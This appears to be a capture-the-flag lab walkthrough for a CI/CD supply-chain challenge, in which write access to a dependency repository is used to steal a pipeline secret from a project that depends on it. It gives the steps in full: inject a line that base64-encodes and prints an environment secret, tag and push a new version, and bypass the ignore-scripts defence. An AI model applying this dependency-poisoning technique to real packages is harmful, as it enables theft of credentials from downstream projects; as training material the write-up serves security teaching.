The Wonderland/Twiddledum repository is a JS app that uses Wonderland/Twiddledee as a dependency (view its package.json file).
You have write access to the Wonderland/Twiddledee repository. Use your access to modify it in order to exfiltrate pipeline credentials of projects using it.
Trying to add pre or post-install scripts with malicious code should fail, as the Twiddledum pipeline runs with the –-ignore-scripts param.
-
Clone the Wonderland/twiddledee repository.
-
Add the following line to index.js to print it to the job’s console output (or send it to a remote server you control):
console.log(Buffer.from(process.env.FLAG6).toString("base64"))
-
Commit the changes to the main branch.
-
Create a new tag
1.2.0for the last commit and push it:git tag 1.2.0 HEAD git push origin 1.2.0
-
Manually trigger the twiddledum pipeline.
-
Access the console output of the executed job to get the encoded secret.
